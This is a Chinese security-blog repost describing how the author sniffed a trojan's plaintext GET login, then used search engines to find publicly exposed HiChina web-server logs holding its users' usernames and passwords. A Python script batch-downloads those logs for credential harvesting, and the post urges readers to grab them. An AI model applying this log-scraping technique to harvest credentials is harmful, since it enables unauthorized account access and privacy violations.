万网虚拟机漏洞,拿某VIP木马所有会员 's

admin 2017年4月17日01:22:39评论319 views字数 1651阅读5分30秒阅读模式
摘要

作者:空虚浪子心昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。想起来偶以前拿了另一个VIP马过程,心里痒痒,打算试试。

作者:空虚浪子心

昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。

想起来偶以前拿了另一个VIP马过程,心里痒痒,打算试试。

上次拿了那个VIP马会员用了WHOIS拿的,不小心公布了出去,结果木马作者直接重新生成了所有用户。

经验教训,这次拿到了绝对不能公布。

这次的VIP验证和灰鸽子的大同小异,都是把用户名密码扔到验证服务器,验证后下载服务端。

所以会发送用户名密码出去。

监听本地通讯,得到地址:http://xxx/ip/20071125xxxx.asp?user=kxlzx&pass=kanhenmekan!&version=1.0

如果验证成功,返回一个EXE文件。

可以得到信息:
1,HTTP协议
2,GET方式提交数据

GET数据也就是说,IIS会把日志记录下来,日志里会有密码。。。

类似于:
20080126-00:47:40 66.249.xxx 200 http://xxx/ip/20071125xxxx.asp user=kxlzx&pass=kanhenmekan!&version=1.0

20080126-00:54:02 66.249.xxx 500 http://xxx/check.asp |-|ASP_0113|脚本超时 181578

当然之前并不知道居然能拿到日志。

获取了验证文件地址后,在google搜索该木马的域名,居然搜到了万网的日志记录。。。。无语。。。

注意记录的格式:

20080218-00:41:05 124.132xxx 200 http://www.xxx …… 218.19xxx 200 http://www.xxx/ip/20071026Psxxx.asp user=jeffrey8273&pass=fedoracore…
cn-22.hichina.com/asplog/log20080218.txt – 38k – 网页快照 – 类似网页

20080220-00:37:26 194.110xxx 200 http://www.xxx…… http://www.xxx/ip/20071026xx.asp user=kalaam&pass=ne
|-|ASP_0113|脚本超时107125 …
cn-22.hichina.com/asplog/log20080220.txt – 38k – 网页快照 – 类似网页

这里:cn-22.hichina.com/asplog/log20080220.txt
cn-22.hichina.com是万网的服务器,log20080220.txt 是日志地址。
明明验证的服务器不再万网,这个日志为什么记录了vip木马的用户呢?

推测是这样的,该VIP用户验证服务器曾经放在万网,被记录下来了。而万网有着良好的保存日志习惯。

既然里面有VIP用户,就不客气了,python写了个脚本,抓他们。
import urllib
month=1
while(month<7):
day=0
while(day<32):
tmp = ”+str(month)+str(day)
if (len(tmp)==2):
tmp = str(month)+tmp
strtmp = ‘http://cn-22.hichina.com/asplog/log20070&#39;+tmp+&#39;.txt&#39;
sock = urllib.urlopen(strtmp)
htmlSource = sock.read()
sock.close()
strpath = ‘log20080’+tmp+’.txt’
f = file(strpath, ‘w’)
f.write(htmlSource)
f.close()
day=day+1

print tmp
month = month+1

PS: 抓到后,按照原来的文件名保存下来。其实也可以用迅雷抓,为什么要用python呢?
-_-!这不刚学了python,显摆么。。。。

抓下来的文件,拿editplus搜索该域名,得到了N多用户名密码。就不抓图了,免得某些人转载的时候说咱写的东西图太多。。。

运气好的哥们儿速度抓撒,能拿到了也别传啊。。。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月17日01:22:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   万网虚拟机漏洞,拿某VIP木马所有会员 'shttps://cn-sec.com/archives/45148.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息